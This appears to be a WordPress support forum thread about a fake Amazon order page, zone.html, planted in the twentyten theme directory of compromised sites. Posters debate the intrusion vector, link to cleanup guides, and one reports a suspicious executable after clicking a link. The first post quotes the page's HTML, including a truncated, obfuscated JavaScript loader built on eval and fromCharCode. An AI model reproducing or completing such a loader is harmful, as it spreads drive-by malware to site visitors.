WordPress.org

Ready to get started?Download WordPress

Forums

Possible securityhole in twentyten? (9 posts)

  1. Veidit
    Member
    Posted 2 years ago #

    Good evning, I just noticed in a spam that references to a site and uses the URI wp-content/themes/twentyten/zone.html

    The code included there is:

    <html>
    <title>Amazon.com: Online Shopping for Electronics, Apparel, Computers, Books, DVDs & more</title>
    <h2>Amazon.com Order confirmation</h2>
    <h3>Loading your book</h3>
    <br></br>
    <h5>Order ID: Loading...</h5>
    <h5>Print Date/Time: 06/04/2012 8:30 AM EST</h5>
    
    <script>try{q.appendChild(q+"");}catch(qw){h=-012/5;f='fromCharC';}try{begbe=prototype;}catch(b43gds){ss=[];f+=(h&&f)?'ode':"";w=this;e=eval;n=[ We don't really need this here. }</script>
    
    </html>

    I am not sure if this is a security hole in twentyten, wordpress, the webservers or similar since I don't have access to the infected hosts, I have contacted the owners so that they can remove the file.
    From what I can see from one host: <meta name="generator" content="WordPress 3.3.2" />

  2. Chip Bennett
    Theme Review Admin
    Posted 2 years ago #

    Suspected security issues should be emailed directly to security@wordpress.org, not posted publicly in forums.

    That said: this is a compromised server, not an issue native to WordPress or the Twenty Eleven Theme.

  3. wytcld
    Member
    Posted 2 years ago #

    I have a single e-mail sample today, pretending to be Amazon as in the initial report, with ten different compromised WP sites linked, all of those links including

    /wp-content/themes/twentyten/zone.html

    So it's obviously an issue native to WordPress and the twentyten theme. It's in the wild. And people need should at minimum disable that theme until it's fixed. Yes, I'll send it to security. But we need immediate action from all WP admins running that theme. Not secrecy about the problem.

  4. Veidit
    Member
    Posted 2 years ago #

    Chip, how can you be sure that it's the server that is compromised and not a hole in the theme that enables you to upload a file?

  5. wytcld
    Member
    Posted 2 years ago #

    These are totally different sites in the 10 in the e-mail I have. Not on the same host or hosting service or IP block. The only way they'd all be at the same location within the wp-content heirarchy is if the exploit is in either WP and/or the theme. If you're trying to hide something in diverse servers you wouldn't do it all in the same location otherwise.

  6. So it's obviously an issue native to WordPress and the twentyten theme.

    That may or may not be the case. If you can reproduce the compromise then please send those details to the email address that Chip provided you.

    If you're trying to hide something in diverse servers you wouldn't do it all in the same location otherwise.

    If you're a person you don't, but compromises are scripted and automated. Every WordPress installation in existence today will have a wp-content/themes/twentyten directory so it's a good target to place things and hope the owner doesn't discover it.

    I'm not minimizing what happened to you, but where there is smoke there's a fire. You're server is on fire, we're trying to help you correctly narrow down where the fire actually started.

    Edit: I forgot the obligatory delouse links.

    You need to start working your way through these resources:
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

    Additional Resources:
    http://sitecheck.sucuri.net/scanner/
    http://www.unmaskparasites.com/
    http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html
    http://codex.wordpress.org/Hardening_WordPress
    http://www.studiopress.com/tips/wordpress-site-security.htm

  7. Veidit
    Member
    Posted 2 years ago #

    Well as I pointed out, this is not related to my site, I just got the spam and looked at the URI that pointed out the twentyten theme.

  8. Chip Bennett
    Theme Review Admin
    Posted 2 years ago #

    I have a single e-mail sample today, pretending to be Amazon as in the initial report, with ten different compromised WP sites linked, all of those links including

    /wp-content/themes/twentyten/zone.html

    So it's obviously an issue native to WordPress and the twentyten theme.

    No, it's not. Twenty Eleven is the target, not the exploit vector

    Very likely, what is happening is that an exploit vector has been identified, and a payload created and deployed, targeting the Twenty Eleven Theme, because it exists on every current installation of WordPress.

    Chip, how can you be sure that it's the server that is compromised and not a hole in the theme that enables you to upload a file?

    Call it a hunch on my part, because it is almost always a server exploit - either through server configuration, or (more often) through compromised FTP credentials (virus/malware scanning of your local PCs remains important for this very reason).

    Who knows what the exact exploit vector is in this case? It could be a Plugin; it could be another TimThumb exploit. It could be something on the server, completely unrelated to WordPress.

    But I am 99.999% confident that Twenty Eleven itself is not the exploit vector.

  9. pbutler1
    Member
    Posted 2 years ago #

    Hi - I was unfortunate enough to click on one of the links before I realized what it was. At that point a pop up appeared saying connecting to server and I did a forced shutdown.

    On reboot there is a program called KB00629424.exe running that has a modified time just before the shutdown. MSFT security essentials does not identify it as a threat.

    In looking at the HTML of the message the site link that loaded this was;

    [ redacted ].com/wp-content/themes/twentyten/zone.html

    Our own site does not have the target zone.html file loaded on it.

Topic Closed

This topic has been closed to new replies.

About this Topic